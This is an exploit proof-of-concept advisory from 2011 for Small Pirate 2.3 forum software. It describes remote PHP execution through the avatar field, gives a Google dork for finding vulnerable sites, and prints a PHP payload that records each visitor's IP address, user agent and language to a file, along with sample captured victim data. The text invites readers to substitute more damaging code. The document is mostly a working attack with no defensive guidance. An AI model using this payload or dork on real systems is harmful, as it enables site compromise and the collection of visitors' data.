# Exploit Title: Small Pirate <= 2.3 (avatar) Remote PHP File Execute PoC
# Google Dork: Powered by Spirate 2.3 & SMF
# Date: 25/03/2011
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software Link: http://www.spirate.net
# Tested on: Linux
[Comment]
Agradecimmientos: Hernan Jais, Alfonso Cuevas, Inyexion
Lucas Apa, Juan Urbano, Sunplace, KikoArg
Knet, Harakiri, Luciano Lapporta Podazza,
SIR y en especial a mi madre.
[POC]
This vulnerability allow execute a php external file in any visitor of the forum.
The php file should have the malicious code.
The scope of the attack depends on the strength of the php file.
<?php
// Exploit Title: Small Pirate <= 2.3 (avatar) Remote PHP File Execute PoC
$ip = $_SERVER['REMOTE_ADDR'];
$so= $_SERVER['HTTP_USER_AGENT'];
$lan= $_SERVER['HTTP_ACCEPT_LANGUAGE'];
$url= $_SERVER['PHP_SELF'];
$path= $_SERVER['DOCUMENT_ROOT'];
$archivo = 'pwned.txt';
$fp = fopen($archivo, "a");
$string = "
$path$url
VICTIM: $ip
info: $so
language: $lan
";
$write = fputs($fp, $string);
fclose($fp);
?>
[Content of pwned.txt]
/home146/sub011/sc78626-TZRV/xxxxxxxxx.org/poc.php
VICTIM: 207.182.149.243
info: Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13
language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0